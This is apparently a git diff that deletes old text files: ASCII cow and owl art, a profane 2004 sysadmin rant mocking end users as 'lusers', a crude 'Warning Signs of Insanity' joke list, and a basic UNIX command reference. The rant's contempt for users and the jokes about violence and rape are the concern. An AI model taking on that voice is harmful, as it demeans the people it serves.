- [`-'] [`-'] [`-'] [`-']
- -"-"- -"-"- -"-"- -"-"-
- T-V owl owl with glasses owl with top-hat owl with fez
- ___ ___ _____ _
- <*,*> <*,*> /o \_/ | * *
- [`-// [`o'] [ _ | "owl"
- -"-"- -"-"- `-----' `-'
- owl with sling medalion owl surreal owl owl in cave owl
- ___ ___
- <*,-> <*,*>
- [`-'] [`S']
- -"-"- -"-"-
- confidential owl super owl
- (__)
- (oo) U
- /-------\/ /---V
- / | || * |--| .
-* ||----||
- ^^ ^^
-Cow at 1 meter. Cow at 100 meters. Cow at 10,000 meters.
- (__) )__( vv vv
- (oo) (oo) ||----|| *
- /-------\/ *-------\/ || | /
- / | || / | || /\-------/
-* ||----|| / ||----|| (oo)
- ^^ ^^ vv vv (~~)
-American Cow Polish Cow Australian Cow
- (__) (__) (__)
- (oo) ____ (oo) _---_(oo)
- /-------\/ /- --\/ /- -\/
- / | || / | || /| ||
-* ||----|| * ||___-|| * ||___-||
- ^^ ^^ ^^ ^^ ^^ ^^
-Freshman Cow Freshman Cow Freshman Cow
-Arriving at RIT After the "Freshman 15" After the "Freshman 20"
- (__) (__) (__)
- (OO) (@@) (xx)
- /-------\/ /-------\/ /-------\/
- / | || / | || / | ||
-* ||----|| * ||----|| * ||----||
- ^^ ^^ ^^ ^^ ^^ ^^
-Cow who drank Jolt Cow who ate Cow who used Jolt to wash
- psychadelic mushrooms down psychadelic mushrooms
- [5m(__) [7m(__) [0m [7m [5m
- [0m
- [5m(oo) [7m(oo) [0m [7m [5m
- [0m
- [5m/-------\/ [7m/-------\/ [0m [7m [5m
- [0m
- [5m/ | || [7m/ | || [0m [7m [5m
- [0m
- [5m* ||----|| [7m* ||----|| [0m [7m [5m
- [0m
- [5m^^ ^^ [7m^^ ^^ [0m [7m [5m
- [0m
-Cow within 100 miles Cow within 10 miles Cow within 1 mile
- of Chernobull of Chernobull of Chernobull
- (____) (____) (____)
- (oo ) (o o) ( O O)
- /-----------\ / /-----\ /---- /-----------\ /
- / || | \/ / | | \/ | / || | \/
- / || |||| \ | | | | | / || ||||
- * ||||-----|||| *| | |-----| | | * ||||-----||||
- /\/\ /\/\ /\ /\ /\ /\ ^^^^ ^^^^
- This cow belonged This was Salvatore No one was sure whether
- to Pablo Picasso Dali's favorite cow M.C. Escher's cow had four
- legs or eight
- . . And now, the Golden Bovine Awards!
- (__)
- (oo) (_)
- /-------\/ V
- / | || /G\
- * ||----|| ___[B]___
- ^^ ^^ | |
- \
- (__) (___)
- (oo) (_) (O O)
- /-------\/ V \ /---------\
- / | || /G\ O || | \
- * ||----|| ___[B]___ ||-----|| *
- ^^ ^^ | | ^^ ^^
-..and with its onboard floating point
-and dual I and D cache buffers, the
-CLIPPER will blow the doors off of any
-micro in its class. QUICK, ONE'S COMING !!!
- \ \
- \ \
- (__) (__) (__)
- (oo) (oo) (oo)
- \/ \/ \/
- /----\ /----\ /----\
- /| |\ /| |\ /| |\
- ^ | | ^ ^ | | ^-+ ^ | | ^
- | | | | |C| | |
- /----\ /----\ +-+ /----\
- / \ \ / \ \ / \ \
- ^ * ^ ^ * ^ ^ * ^
- MOO Oh, how boring it must
- / be to be a cow.
- (__) (__) \ (__)
- (oo) (oo) _______ (oo)
- /-------\/ \/-------\ // ||\ \ \/-------\
- / | || || | \ _____//___||_\ \___ || | \
- * ||----|| ||----|| * ) _ _ \ ||----|| *
- ^^ ^^ ^^ ^^ |_/ \________/ \___| ^^ ^^
-..So explain to me again how
-they were able to acheive
-zero wait states...
- \ It's party time!
- \ \
- (__) (__) (__)
- (oo) (oo) (oo)
- \/ \/ \/
- /----\ /----\ /----\
- /| |\ /| |\ /| |\
- ^ | | ^ ^ | | ^-+ ^ | | ^
- | | | | |C| [BUD]| |[BUD]
- /----\ /----\ +-+ [SIX]/----\[SIX]
- / \ \ / \ \ / \ \
- ^ * ^ ^ * ^ ^ * ^
- (__) (__) __)
- (oo) (oo) o)
- /-------\/ /-------\/
- / | O || * ||----||
-* ||----|| || ||
- ^^ ^^ ^^ ^^
-Cow that gives Cow that gives Cow that gives
-(W)hole Milk. Low-Fat Milk. 2% Milk.
- (__)
- (dd) .
- /-------\/
- / | || U .
-* ||----|| /---V .
- ^^ ^^ * |--| .
-Cow that gives Cow that gives Cow that gives (gave)
-Vitamin D Milk. Condensed Milk. Evaporated Milk.
-Warning: Two of the last three are crude.
- (__)
- __(oo)
- (__) / \/ (__) (___)
- milk / \\ (oo) (O O)
- /-------\/ /| /-^^---\/ /--------\ /
- / | || / | /| || / | ||O
-* ||----|| * || ||----|| * ||@\---||
- ^^ ^^ ^^ ^^ ^^ ^^ ^^
-Cow that gives Cows that give Cow that gives
-Pasteurized Milk. Homogenized Milk. Cream.
-Here are the national standards for wheel-base classification:
- (__) (__) (__) (__)
- (oo) (oo) (oo) (oo)
- /-----------\/ /---------\/ /-------\/ /-----\/
- / | || / | || / | || / | || U
-* ||--------|| * ||------|| * ||----|| * ||--|| /---V
- Full-Size Cow Mid-Size Cow Compact Cow Sub-Compact Cow Yugo
-These are some of the various models offered:
- __ (__) ______ (__) (__) (__)
- / \ (oo) / \ (oo) (oo) \ (oo)
- / ---\/ * --\/ /| |---\/ @ ---\/
-* | || | || * |______| || /| || U
- ||----|| ||--------|| ||--------|| * ||------|| /---V
-Hatch-Back Station Wagon Pick-up Truck Convertable Roller Skate
-Although some people like to customize their cows:
- (__) \
- (oo) \
- /-------\/ (__) \__)
- / | || /---_ (__) (oo) (oo)
-* ||----|| / | -_(oo) /-----------\[] /--------\/
- OOO OOO * ||-_ |\/ / | |[] /|=======|| * U
- O O O O || -_|| * ||--------|| * ||------||( \---V
- OOO OOO OO OO OO OO @@ @@ O--O
-Beach-comber's A Low-Rider Chevy Impala Aluminum alloy Yugo with
- Deluxe with Fuzzy Dice rims, fog lamps, rear
- cb radio, and spoiler
- custom pin-striping
-Then there are the luxury cows:
- (__)
- (oo)
- /---------------------------------------------\/
- / | || U
-* ||------------------------------------------|| /-----V
- OO OO * O----O
- Stretch Limo Yugo Limo
-And the workforce of the interstate cowing industry:
- /------------------------------------------
- / | |
- / | Upstate Milk Cooperatives | (_____)
- / | | ( O O )
- / | | \ /
-* |________________________________________|___\ /
- OO OO OO OO O . .__.,,
- The Eighteen Hoofer Yugo after being
- run over by the 18 hoofer
-Here is Hugh Heifer himself, with a couple of his PLAYBULL Bunnies.
-Of course, whenever Hugh is around the mansion, he always wears his
-comfortable silk bathrobes.
- \ / \ /
- \__/ (___) \__/
- (oo) (o o) (oo)
- /-------\/ /---+----\ / \/-------\
- / | || / | | ||O || | \
-* ||----|| * ||-+---|| ||----|| *
- ^^ ^^ ^^ ^^ ^^ ^^
-Meanwhile, in the photo studios in the back of the mansion, we see next
-issues centerfold posing in front of the camera.
- (__) O
- (o[o]| * (__)
- /-------\/ v / (oo)v
- / | ||_/ \-------\/ \
-* ||----| v____/ / \/
- ^^ ^ v___\____v/___/
-Probably an RIT Is this one beautiful
-photo graduate bovine, or what?
- (_ _)
- (__) (o o)
- (oo) \ /-------\
- /-------\/ || | \
- * ||----|| ||----|| *
- ^^ ^^ ^^ ^^
-Strawberry Shortcake Banana Split
- (__) (__) *
- (oo) (oo) /
- /-------\/ \/-------/
- / | || || | o
-* ||----|| ||----|| ooo
- :: :: ^^ ^^ oooooo
-Your team skates Like a pile of . . .
-(__) (__)
-(oo) (oo)
- \/-------\ /-------\/
- \\ \ \ / / //
- \\----\\ * * //----//
- ^^ ^^ ^^ ^^
-Shift to the left Shift to the right
- (__)
- (oo)
- /--\/--\ (__)
- / | | \ (oo)
-^ | | ^ ---\/----<
- /----\ | \-+-<
- / \ \ | |
- ^ * ^ *__|__-+-<-<
-Stand up Sit down
- (__) * (__)(__)
- (xx) \ (@@)(oo)
- /-------\/ >---\------\/ \/-------\
- / | || | ||>---| || \
- * ||----|| |-----|| |----|| *
- ^^ ^^ ^ ^^ ^ ^^
-Fight, fight, fight!
- \ No newline at end of file
diff --git a/.md/thoughts/txt/ b/.md/thoughts/txt/
deleted file mode 100644
index cea504b..0000000
--- a/.md/thoughts/txt/
+++ /dev/null
@@ -1,275 +0,0 @@
- A General TXT on My Personal Gleanings
- and Experience with Network Neophytes
- and the Everyday Joe/Jane "luser".
-"There is a principle which is a bar against all information,which is proof
-against all arguments and which cannot fail to keep us in everlasting
-ignorance............that principle is contempt prior to investigation."
-Herbert Spencer
- BY: F A R T B L O S S O M
- Sept. 8, 2004
- ;)_
-To quote a saying by the infamous Bastard Operator from Hell, "They never
-learn." No statement written about network lusers has ever rung more true
-than that simple phrase. People simply do not learn, they do not want to
-learn, they fight the process and the more one tries to enforce learning or
-encourage learning, more and more resistance is met.
-Example from the open road: A guy pulls out in front of a truck after
-running a red light and narrowly misses getting hit. Two weeks later at
-the same intersection he pulls the same stunt. I have seen this scenario
-repeated over and over right in front of my house, at the local K-Mart
-red light, and on main street in the local town at the busiest inter-
-section in the entire city. Same cars same people same scenario and
-they never learn.
-The only time they get the hint is when luck runs out and they end up
-in the hospital or dead. Like Mother used to say of my dear sister,
-"She won't believe I will whip her until she feels the sting of the
-switch." And usually when they get the hint, if the live through the
-accident they have the fucking audacity to sue the person who hit them
-even though it wasn't the other person's fault.
-I write this from the (albeit biased) standpoint and position of veteran
-sysad for numerous WAN/LAN's for about 8 years. This is what I do, how
-I make my money and suffice it to say dealing with end users has caused
-no small amount of stress in my life over the years.
-When I first began this task of luser management, along with workstation
-break/fix and WAN/LAN sysad duties back in early 1995 I kept having the
-feeling that I was being left behind. I didn't know much about computers
-or networking back then, so I maintained a constant effort over the years
-to learn all I could about my newly acquired craft. When I finally began
-managing my own systems as senior IT I finally got appreciation for the
-oft repeated phrase, "In the land of the blind the one-eyed man is king."
-When I, the humble meek computer geek fizzled onto the sysad scene
-I discovered a profound truth. I KNOW MORE THAN THEY DO. I was stunned
-that all of the talented degreed and credentialed folks I was serving as
-sysad for knew ABSOLUTELY FUCKING NOTHING about computers and eight years
-THAT SIMPLE FACT ABSOLUTELY FLOODED AND FLOORED MY SIMPLE HICK MIND AT THE TIME! How could I know more than someone with a PhD when I barely made
-it through the 12th grade?
-They dont want to know about computers, they want it all done for them
-since they are too fucking stupid and lazy to learn something new. This
-is not only referring to older lusers, but the young ones as well. They
-churn them out of the big industry mechanism stupid. The college kids
-exist to make a professor smile, so they can get an A. Don't think for
-yourself, think the way I tell you and I smile on your Doctorate.
-"Madness," as biblical King Solomon might say as the Preacher, all is madness."
-------- topic switches abruptly ------------------------------------------
-I can't tell you the number of times I get blamed for walking past a server
-room and when the power cycles I get bitched at because it must've been
-something I did. After all I was in the area. And I am an asshole in
-their eyes, therefore it isn't the fault of the power company, since I
-have all these fucking magical TCP/IP wizard telepathy powers I control
-the fucking power grid.
-I hate stereotypes.
-(A quick sidenote, I often mention to my wife that this is what racial discrimination must feel like. It sucks to be on the shitty end of a preconcieved notion.) Or as Frank Zappa might say, it is called
-About my assistant, she is an excellent pc tech and is wonderful with
-the dear lusers whereas I usually come across as a dickhead or asshole
-to them. I don't know why since I try like hell to be nice, I guess they
-can't handle a non-degreed ex-vet bossing their superior padded PHD
-asses around in the computer arena. Alas that is the corporate curse of
-the humble yet knowlegeable sysad. You know more than they do therefore
-you are an asshole.
-I cite examples of ineptitude:
-1. Most people I work with don't know how to create an icon in Windows.
-2. Most people choose passwords like this:
- baby daddy baseball triplets (their initials) (their birthday)
-3. Most lusers have a memory as long as my dick.
-4. Most lusers put passwords in desk drawers, under mousepads and my
- personal favorite, they WRITE IT ON THE FUCKING MONITOR ON A DAMN
- STICKY NOTE. So much for network security.
-5. Most lusers refer to Windows 97 as their operating system or Microsoft
- as their operating system when asked.
-6. Most lusers can't differentiate between physical RAM and a hard drive.
- Example: How much memory do I have? Can I get rid of some of it to
- free up space on my machine?
-7. Most lusers can barely operate MS Word
-8. The most frequent question I am asked on initial PC orientation of
- new employees is, "What's a URL?"
-9. The next question I get, even though I manage over 1000 nodes, 20
- WAN links and over 5000 users is, "Do you read our email?"
-10.I have once watched a former sysad friend of mine convince a lady
- who was a veteran computer trainer that her problem was leaking
- packets. He actually had her on the floor looking for packets that
- fell out of her laptop connector and out of the wall jack, NO SHIT!
- I almost pissed myself I laughed so hard. And this lady was teaching
- other employees! Isn't that novel? The Bible tells us "if the blind
- lead the blind, both fall into the ditch."
-11.My favorite bitch of all: "Do you do computer work on the side?"
- Read this to mean, "I want my pc/modem/monitor/hard drive/data/mouse/
- keyboard/floppy/scanner/printer fixed absolutely free because after
- all I want something for nothing and you must give it to me because
- I am a luser and can tattletale to the boss that you are mean."
-(If I have to fix one more Packard Bell Legend, one more shitty ass
- Hp Pavillion I am going to go ballistic on somebody!!!!!!)
-So you might ask what is the point of this article. Mainly I wanted to
-vent and since I am such an asshole (I am really not, ask my wife) I
-have no other folks to vent to. You might also ask, "If you hate the
-lusers so much why do you keep staying there?" Good question. This
-seems to be the best place for me to further my career.
-I have excellent access to the latest and greatest technology.
-Plus its hard to find a job in this recessive economic downturn. All
-of the sysads are being axed for cheaper prices in India.
-It seems everyone wants a degreed sysad and I don't have one. While
-most were busy going to college and fucking their sweethearts and playing
-at being a man, I was busy serving my country during Desert Storm in the
-good old US MILITARY. So I don't have a fucking degree, looks like I am
-stuck here until someone feels sorry for me. :( I, just as the simple
-little lusers I faithfully and dutifully serve, have a wife and home
-and bills and I have to eat too.
-The main point I wanted to get to is this. Most people are sheep. Just
-like Jesus said in the Bible, "All like sheep have gone astray." True
-and even I have done some dumb stuff in my life. But I try like hell to
-learn and not repeat mistakes. Your average Joe and Jane luser does not.
-First, they hate the machine. They resent it. They fear it and all who
-come in defense of the PC. They don't want it. Management forces them
-to use it and won't have it any other way. The luser has bills to pay
-and kids and a husband or wife at home to take care of, therefore the
-machine is a hated entity because it is forced upon them. True enough.
-They are hereby stuck in a hard position.
-They hate technology but are forced to use it, the economy won't let them
-leave for a better job, their home life probably sucks ass, therefore
-the popular pastime is, "Hey, lets take it out on the computer guy!"
-"He has no life, its his fault." I am the embodiment of pure human to
-machine interface. I am the computer come in man-form to their pathetic
-little cubicles. I am therefore the target of all their frustrations.
-Or as I have told my wife, I am like an ambulance driver. I usually get
-them when its almost too late. I really really want to help, and I really
-want what's best for them. I swear to God I do.
-Persecution complex you say? Perhaps. Schizophrenic musings of an
-intelligent lunatic? Fuck you for noticing. I just gave up Zoloft
-for cigarettes again. You believe whatever the hell you wish. At least I
-am honest with myself. Narcissist? Fuck no. Anti-social? You bet, a
-learned behavior. These stomach pains are for real motherfucker.
-A lot of lusers are close to retirement and hatefully despise technology.
-I have often heard even our CEO state, "I wish we could just somehow
-get rid of all of the computers and go back to the old way." I actually
-heard that oral turd dispenser say that on numerous occasions.
-The CEO also mentioned (on the 15th time he got a complaint) that I was mean,
-to the poor, unfortunate always right and perfect lusers, and he
-threatened to fire me. I in a super nice way told him to fire me now
-and not to wait. Don't fuck around, do it NOW! Right fucking now!
-Don't dangle that carrot, don't threaten me. I will flip fucking hamburgers
-if that is what I have to do. I am not too proud.
-He hesitated and I am still not fired five years later. He won't
-fire me and do you know why? It would cost him double to pay someone now
-to replace me and that person would probably have a learning curve of at
-least 18 months to get up to speed. Plus it would take a new sysad
-about 1 year to restabilize what I picked up as a large fucking cobbled
-together excuse of a WAN/LAN.
-I literally rebuilt this unorganized grabastic hunk of shit cheap WAN
-from scratch. They had no program until I got here. No pride because I
-fought, scratched, bitched, whined, complained, and prayed prayed prayed to
-God every step of the way. So I guess God gets the credit, not me.
-Let me put this to you. Nobody is permanant. Everyone is expendable and
-even I never forget this rule. I am quite sure they could find some little
-eager upstart to take my desk, my terminal and my job from me. And the
-sad thing is the little shit probably has a college degree. He may even
-know a little about networks, perhaps the OSI model.
-But do you know the one thing Mr. College doesn't have that I have?
-Experience with all sorts of people and machinery to be exact. I was
-in a maintenance and electronics career for 15 years before I became sysad.
-I have worked on everything from radio to microwave, to weapons systems to
-VCR's. I have soldered boards, built houses, mixed paint, and broken
-into combination locks (legally). I have shoveled shit, helped calves
-give birth and made homebrew antennas to pick up long range radio stations
-with. I have plowed fields and rebuilt engines, I have been both grounded
-and on top of the world.
-What else do I have that Mr. College still shitting yellow doesn't? I have
-the heart, mind, body, and soul of a sysad. Good admins are made, not
-born. It takes work to get up every day even though you feel like never
-getting out of bed again and have taken 81 asschewings this year already
-for shit they keep piling on you that you have yet to finish, and haven't
-enough time or techs to help you.
-What else do I have Mr. Fucking Know it all college PUNK doesn't have?
-I care about my lusers. I really really do. I don't want them to lose
-their data, or their pc to a virus. Hell no!
-What else do I exhibit that Mr. College fresh wannabe doesn't? I am true
-to my God and to myself. I do not like to lie to me. I know what I know
-and that is all I know, but I want to know more and more. I spend hours
-upon hours in books, on the 'Net trying to learn one more thing to insulate
-my lusers from the real world of computing. Anything I can do to make their
-lives and mine easier that is what I look for. Nothing else will do.
-I want to make them happy. Yet they still fucking fight me and turn me
-in because I say what they don't like, I tell them the truth. Yes the
-drive has crashed and you lost everything. They can't handle that.
-One more final thing I have that college boy doesn't. I have humility.
-Humility of a kind that is born in the crucible of hard ass mind numbing
-deadlines, and thankless work and hard decisions daily. My humility was
-born of numerous ass-chewings, numerous deflations of my pride. Humility
-is setting up Netware 41 times on the same fucking box until you get it
-right, learning each step of the way. Humility is working on a pc for
-three weeks, only to find out it was something retarded all along like
-an unseated stick of ram. Be humble, be available, but be wise as a
-serpent and harmless as a dove.
-I have news for you lusers. Computers are not going away. They are here
-to stay and sysads like me are always going to be needed. Be nice to us
-because there will come a fateful day when your drive crashes, you get a
-virus and you will need our services. You do reap what you sow, that much
-I have learned in all my trials and tribulations of life in general and as
-a sysad.
-It is getting quite late and I am quite sure I have wasted enough of your
-valuable time reading this. I think the BOFH put my real feelings in print
-best: "I know I have that LAN cable I spliced into the power cord somewhere.
-EOF \ No newline at end of file
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- The Warning Signs Of InSaNiTy
- ---------------------------------------
- 1. Your friends tell you that you have been acting strange lately, and
- then you hit them several times with a sledgehammer.
- 2. Everyone you meet appears to have tentacles growing out of places that
- you wouldn't expect tentacles to be growing from.
- 3. You start out each morning with a 30-minute jog around the bathroom.
- 4. You write to your mother in Germany every week, even though she sends
- you mail from Iowa asking why you never write.
- 5. Every time you see a street sign, you have a tremendous urge to
- relieve yourself on it.
- 6. You wear your boxers on your head because you heard it will ward of
- evil dandruff spirits.
- 7. You're always having to apologize to your next door neighbor for
- setting fire to his lawn decorations.
- 8. Every commercial you hear on the radio reminds you of death.
- 9. People stay away from you whenever they hear you howl.
-10. Your breath smells more and more like squirrel dung each passing day.
-11. You laugh out loud during funerals.
-12. When your doctor tells you to say ah, you yell out "RAPE! RAPE!"
-13. Nobody listens to you anymore, because they can't understand you
- through that scuba mask.
-14. You begin to stop and consider all of the blades of grass you've
- stepped on as a child, and worry that their ancestors are going
- to one day seek revenge.
-15. You have meaningful conversations with your toaster.
-16. Your father pretends you don't exist, just to play along with your
- little illusion.
-17. You collect dead windowsill flies.
-18. Everytime the phone rings, you shout, "Hey! An angel just got its
- wings!"
-19. You like cats. Especially with mayo.
-20. You scream "I've got a knife!" to people who try to sell you things.
-21. You scream "I've got a knife!" to people at your family reunion.
-22. You cry at the end of every episode of Gilligan's Island, because they
- weren't rescued.
-23. You put tennis balls in the microwave to see if they'll hatch.
-24. Whenever you listen to the radio, the music sounds backwards.
-25. You have a predominant fear of fabric softener.
-26. You wake up each morning and find yourself sitting on your head in the
- middle of your front lawn.
-27. Your dentist asks you why each individual tooth has your name
- etched on it, and you tell him it's for security reasons.
-28. Melba toast excites you.
-29. When the waiter asks for your order, you ask to go into another
- room to tell him, because "the napkins have ears."
-30. You tend to agree with everything your mother's dead uncle tells you.
-31. Every time you see the commercial for the Hair Club For Men, you think
- to yourself, "I think I'll kill the pope today."
-32. You call up random people and ask if you can borrow their dog, just for
- a few minutes.
-33. Your main goal in life is to become the president of Bulemia.
-34. Nearly everything you say involves the word, "P-toing!"
-35. You argue with yourself about which is better, to be eaten by a koala
- or to be loved by an infectious disease.
-36. You like to sit in cornfields for prolonged periods of time, and
- pretend that you're a stalk.
-37. You think that exploding wouldn't be so bad, once you got used to it.
-38. You try to make a list of the Warning Signs of Insanity. (cough)
-39. People offer you help, but you unfortunately interpret this as a
- violation of your rights as a boysenberry.
-40. You like reading lists like this. :) (The Paul Richter
- Special Edition Appendix)
-41. You sit in your room for hours on end listening to Peter, Paul & Mary
- and playing solitaire on your computer.
-42. You experience periods of time when your mouth can do nothing but sing
- "Mama's little baby loves short'nin', short'nin...."
-43. You begin to start almost every conversation with the introduction to
- _The A-Team_ theme song.
-44. You spend three hours sitting on the floor cutting and pasting a
- project for your COLLEGE English course, and you get
- really frustrated because you can't recall
- all the kindergarten-period skills that it requires.
-45. You check your e-mail about six times a day, only to find that nobody
- cares enough to send anything to you.
-46. You believe that Quayle would actually win the 1996
- presidentialelection.
-47. You read Anne Sexton's poetry for twelve out of any sixteen-hour
- period.
-48. You read Sylvia Plath to cheer yourself up, and when that doesn't work
- you pop _The Wall_ into the stereo...
-49. You think Popeye's anchor tattoo would look even better on YOUR
- forearm.
-50. You use Speed Stick Clear Ocean Surf Deodorant for the scent.
-51. You start appending a list like this, and you find yourself just going
- on and on and on and on...
-52. You start to repeat yourself.
-53. You start to repeat yourself.
-54. You start really stretching for bad jokes and cheap laughs.
-55. You recognize that you are doing so.
-56. You blatantly announce it.
-57. You keep looking in the Rap section at Tower Records trying to find
- that new M.C. Escher album.
-58. Your greatest accomplishment to date in your college career is your
- new-found ability to blow smoke rings.
-59. You resort to mass e-mailings as your sole means of unabashedly begging
- for attention.
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index 722122e..0000000
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- ~~~~
- Command Description
- ~~~~~~~ ~~~~~~~~~~~
- awk Search for a pattern within a file. Includes
- a built-in programming language.
- bdiff Compares two large files.
- bfs Scans a large file.
- cal Displays a calendar.
- cat Concatenates and prints files.
- cc C compiler.
- cd Change directory.
- chgrp Changes a file's group ownership.
- chmod Changes a file's access permissions.
- chown Changes the individual ownership of a file.
- cmp Compares two files; diplays the location (line
- and byte) of the 1st difference between these.
- comm Compares two files so as to determine which
- lines are common to both.
- cp Copies a file to another location.
- cu Calls another UNIX system.
- date Returns the date and time.
- df Displays free space in the file system.
- diff Displays the differences between two files
- or directories.
- diff3 Displays the differences between three files
- or directories.
- du Reports on file system usage.
- echo Displays its argument.
- ed Text editor.
- ex Text editor.
- expr Evaluates its argument which is generally
- a mathematical formula.
- f77 FORTRAN compiler.
- find Locates the files w/ specified characteristics.
- format Initializes a floppy disk.
- grep Searches for a pattern within a file. (see awk)
- help Salvation.
- kill Ends a process.
- ln Used to link files.
- lpr Copies the file to the line printer.
- ls Displays info. about one or more files.
- mail Used to receive or deliver e-mail.
- mkdir Creates a new directory.
- more Displays a long file so that the user
- can scroll through it.
- mv Used to move or rename files.
- nroff Used to format text.
- ps Display a process's status.
- pwd Display the name of the working directory.
- rm Removes one or more files.
- rmdir Deletes one or more directories.
- sleep Causes a process to become inactive for a
- specified length of time.
- sort Sort and merge one or more files.
- spell Finds spelling errors in a file.
- split Divides a file.
- stty Display or set terminal parameters.
- tail Displays the end of a file.
- troff Outputs formatted output to a typesetter.
- tset Sets the terminal type.
- umask Allows the user to specify a new creation
- mask.
- uniq Compares 2 files. Finds and displays lines
- in one file that are unique.
- uucp UNIX-to-UNIX execute.
- vi Full screen editor.
- wc Displays details in the file size.
- who Info. on who else be online.
- write Used to send a message to another user.
- awk program filenames
- awk -f programfilenames filenames
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [awk] utility can be used to find any lines in a file which
- match a certain pattern; once found, these lines can be processed.
- In the first configuration, the program that [awk] is to
- execute is specified in the command line. In the second,
- the program is stored as the file given in programfilename.
- The -f option instructs [awk] to read this file.
- [bdiff] is used to compare files too large for [diff]. See
- [diff] for the format.
- bfs filename
- ~~~~~~~~~~~~
- [bfs] is used to scan a large file to determine where to split
- it into smaller files.
- cal 01-12 (month) 0-9999 (year)
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [cal] utility can be used to display a calendar of any year
- from 0 to 9999 AD, and any or all of the twelve months.
- cat filename
- ~~~~~~~~~~~~
- [cat] can be used to examine a short file. See [more] for
- lengthier files.
- number[cc]
- ~~~~~~~~~~
- The [cc] command changes the entire current line, or a group
- of lines starting with the current line. [number] represents
- the number of old lines to be deleted.
- cd directory name
- ~~~~~~~~~~~~~~~~~
- The [cd] command causes the current working directory to be
- changed. The [directory name] can be either a full or partial
- path name.
- chgrp groupname filename
- ~~~~~~~~~~~~~~~~~~~~~~~~
- This command changes the group ownership of a file.
- chmod {ugoa} {+-} {rwx}
- ~~~~~~~~~~~~~~~~~~~~~~~
- The [chmod] utility changes a file's access permissions. [u]
- specifies the user or owner's login name, [g] specifies a group
- and [o] indicates all others. [a] indicates the user, group,
- and all others; c'est the default. [+] adds permission; [-]
- deletes it. [r] indicates read, [w] write, and [x] execute.
- chown individualname filename
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [chown] changes the individual ownership of a file (see chgrp).
- cmp filename1 filename2
- ~~~~~~~~~~~~~~~~~~~~~~~
- [cmp] is one of the four principle UNIX file comparison utilities.
- It compares 2 files, and returns the positions where they differ.
- comm -options filename1 filename2
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [comm] utility, in comparing two files, produces three
- columns of output. The first contains lines unique to the
- first file, the second, lines unique to the second, and the
- third column, lines common to both files. By placing the
- numbers [1], [2], and/or [3] in the [options] position, any
- one (or more) of these columns can be suppressed.
- cp sendingfile receivingfile
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [cp] command copies a file. [sendingfile] is the file to be
- copied, [receivingfile] is the file to which it is copied.
- diff [options] filename1 filename2
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Again, a file comparison utility. However, with [diff], the
- differences are displayed as instructions that can be used
- to edit the files so that they are identical.
- diff3 filename1 filename2 filename3
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Similar to [diff], [diff3] is unique in that it can compare
- three files. Gee.
- ed filename
- ~~~~~~~~~~~
- One of the UNIX's three editing utilities, [ed] is a basic line
- editor. I'm sure there are other files that will explain how
- to use [ed]. Thus, I'll confine myself to a rough outline:
- e filename ........... edit a different file
- f filename ........... changes the currently specified file.
- h .................... provides explanation of errors.
- I
- text ................. inserts text before the current line.
- line,linel ........... lists the specified lines.
- line,linen ........... displays specified lines, preceded by
- their line numbers.
- q .................... exit from [ed]
- w .................... writes buffer to current filename.
- + or - ............... +number of lines closer to end
- -number of lines closer to beginning.
- expr formula
- ~~~~~~~~~~~~
- Utility which evaluates an expression.
- find directory searchcriteria parameter actioncriteria parameter
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [find] utility can be very useful indeed, especially when
- confronted by a UNIX with countless files. Basically, this
- command finds files which meet certain criteria, and then
- performs an operation (such as printing the files). Search
- criteria consists of the following:
- Criteria Parameter Description
- ~~~~~~~~ ~~~~~~~~~ ~~~~~~~~~~~
- -name filename Files whose names match [filename]
- will meet this criteria.
- -type filetype Files whose type matches that specified
- [b] block special will meet criteria.
- [c] character spec. file
- [d] directory file
- [f] plain file
- -links +/- x Files with # of links indicated by
- + or - x meet this criteria.
- -user login name Files belonging to user with given
- or user ID # login name or ID # meet criteria.
- -group group name Files belonging to group with given
- or group ID # group name or ID # meet this criteria.
- -size + or - x Files greater than +x bytes or less
- than -x bytes meet this criteria.
- -atime + or - x Files not accessed within +x days,
- accessed within -x days, or acc-
- essed x days ago meet criteria.
- -mtime + or - x Files NOT modified within +x days,
- modified within -x days, or modified
- x days ago will meet this criteria.
- -newer filename Files modified more recently than
- [filename] meet this criteria.
- Action Criteria " "
- ~~~~~~~~~~~~~~~ ~ ~
- -print - When search criteria are met, path
- name of the file is displayed.
- -exec command{ }\; Executes given command when search
- criteria are met. { } indicates file-
- name, [\;] ends the command.
- -ok command{ }\; Exactly like -exec, except user is
- prompted [y] or [n] before command.
- grep -options searchstring filenames
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- Another search command, this for a particular string of chars.
- ln original new
- ~~~~~~~~~~~~~~~
- [ln] establishes a file link. For this utility, [original] repre-
- sents the filename to be linked, [new] the filename of the new
- link to the original.
- [ls] provides directory information. [ls -l/] displays a more
- complete version of the info. list.
- mail username username
- ~~~~~~~~~~~~~~~~~~~~~~
- This utility allows e-mail to be sent to other system users.
- mail
- ~~~~
- Simply typing [mail] checks the user's own mailbox.
- When sending mail, several items must be set:
- ~s text ............ sets the subject field
- ~c user names ...... sends other users carbon copies of mail
- m user names ....... activates the compose mode, with the
- specified users as the message's recipients.
- ~h ................. displays and allows editing of all headers.
- ^D ................. ends message editing; sends mail.
- ~r filename ........ places file in body of message (keen command)
- Reading One's Own Mail:
- h number or range ....... causes specified headers to be displayed
- p message # ............. displays entire message
- d number or range ....... deletes specified messages
- u number or range ....... undelete specified mail during SAME
- mail session (messages removed after q)
- q ....................... leave the post office
- mkdir directoryname
- ~~~~~~~~~~~~~~~~~~~
- [mkdir] allows creation of a subdirectory, for your dining
- enjoyment.
- more filename
- ~~~~~~~~~~~~~
- For longer files, [more] is a convenient utility. It will display
- the first screen of file data and then stop, allowing the user
- to control scrolling henceforth.
- mv oldfilename newfilename
- ~~~~~~~~~~~~~~~~~~~~~~~~~~
- The [mv] utility can be used simply to rename a file, or...
- mv filea fileb... directory
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
- [mv] can also be used to move files to a new directory, provided
- the directory exists, and you have write access to it.
- ps -options
- ~~~~~~~~~~~
